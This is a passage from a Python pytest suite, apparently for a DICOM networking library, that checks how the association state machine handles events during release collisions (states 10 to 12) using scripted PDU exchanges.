('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt11'
]
def test_evt12(self):
"""Test Sta10 + Evt12."""
# Sta10 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rq), # trigger event
('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt12', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt12'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt13(self):
"""Test Sta10 + Evt13."""
        # Sta10 + Evt13 -> AR-10 -> Sta12
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AR-10: Issue A-RELEASE (rp) primitive
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp), # trigger event
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13'
]
def test_evt14(self):
"""Test Sta10 + Evt14."""
# Sta10 + Evt14 -> <ignore> -> Sta10
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt14'
]
def test_evt15(self):
"""Test Sta10 + Evt15."""
# Sta10 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('recv', None), # recv a-abort
('exit', None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt15', 'AA-1'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt15'
]
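        # AA-1 aborts on behalf of the local user, so the abort source byte
        # is 0x00 (DUL service-user) rather than 0x02.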
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta10 + Evt16."""
# Sta10 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_abort), # trigger event
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt16', 'AA-3'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt16'
]
def test_evt17(self):
"""Test Sta10 + Evt17."""
# Sta10 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt17', 'AA-4'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt17'
]
def test_evt18(self):
"""Test Sta10 + Evt18."""
# Sta10 + Evt18 -> <ignore> -> Sta10
# Evt18: ARTIM timer expired from <local service>
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt18'
]
def test_evt19(self):
"""Test Sta10 + Evt19."""
# Sta10 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
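        # 0x08 is not a defined PDU type (valid types are 0x01-0x07), so
        # reading the bogus header below is treated as Evt19.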
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'), # trigger event
            ('recv', None), # recv a-abort
('exit', None)
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt19', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt19'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState11(TestStateBase):
"""Tests for State 11: Release collision req - awaiting A-RELEASE-RP PDU"""
def move_to_state(self, assoc, scp):
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta6')
assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta9')
assoc.dul.send_pdu(self.get_release(True))
self.wait_on_state(assoc.dul.state_machine, 'Sta11')
def test_evt01(self):
"""Test Sta11 + Evt1."""
# Sta11 + Evt1 -> <ignore> -> Sta11
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('request'))
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt1'
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta11 + Evt2."""
# Sta11 + Evt2 -> <ignore> -> Sta11
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta11 + Evt3."""
# Sta11 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_associate_ac),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt3',
]
def test_evt04(self):
"""Test Sta11 + Evt4."""
# Sta11 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_associate_rj),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt4',
]
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta11 + Evt5."""
# Sta11 + Evt5 -> <ignore> -> Sta11
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta11 + Evt6."""
# Sta11 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_associate_rq),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt6',
]
def test_evt07(self):
"""Test Sta11 + Evt7."""
# Sta11 + Evt7 -> <ignore> -> Sta11
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('accept'))
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt7'
]
def test_evt08(self):
"""Test Sta11 + Evt8."""
# Sta11 + Evt8 -> <ignore> -> Sta11
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate('reject'))
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt8'
]
def test_evt09(self):
"""Test Sta11 + Evt9."""
# Sta11 + Evt9 -> <ignore> -> Sta11
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt9'
]
def test_evt10(self):
"""Test Sta11 + Evt10."""
# Sta11 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', p_data_tf),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt10', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt10',
]
def test_evt11(self):
"""Test Sta11 + Evt11."""
# Sta11 + Evt11 -> <ignore> -> Sta11
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt11'
]
def test_evt12(self):
"""Test Sta11 + Evt12."""
# Sta11 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_release_rq),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt12', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt12',
]
def test_evt13(self):
"""Test Sta11 + Evt13."""
# Sta11 + Evt13 -> AR-3 -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AR-3: Issue A-RELEASE (rp) primitive and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_release_rp),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt13', 'AR-3'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt13',
]
def test_evt14(self):
"""Test Sta11 + Evt14."""
# Sta11 + Evt14 -> <ignore> -> Sta11
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt14'
]
def test_evt15(self):
"""Test Sta11 + Evt15."""
# Sta11 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('recv', None), # recv a-release-rp
('recv', None), # recv a-abort
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt15', 'AA-1'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt15'
]
def test_evt16(self):
"""Test Sta11 + Evt16."""
# Sta11 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_abort),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt16', 'AA-3'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt16',
]
def test_evt17(self):
"""Test Sta11 + Evt17."""
# Sta11 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt17', 'AA-4'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt17',
]
def test_evt18(self):
"""Test Sta11 + Evt18."""
# Sta11 + Evt18 -> <ignore> -> Sta11
# Evt18: ARTIM timer expired from <local service>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:5] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9'
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt18',
]
def test_evt19(self):
"""Test Sta11 + Evt19."""
# Sta11 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', b'\x08\x00\x00\x00\x00\x00'),
('recv', None),
('exit', None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt19', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', "Sta11"
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt19',
]
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState12(TestStateBase):
"""Tests for State 12: Release collision acc - awaiting A-RELEASE (rp)"""
def move_to_state(self, assoc, scp):
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta6')
assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta10')
scp.step()
self.wait_on_state(assoc.dul.state_machine, 'Sta12')
def test_evt01(self):
"""Test Sta12 + Evt1."""
# Sta12 + Evt1 -> <ignore> -> Sta12
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('send', a_associate_rq),
            ('recv', None), # recv a-associate-ac
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp),
('exit', None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate('request'))
scp.step()
scp.shutdown()
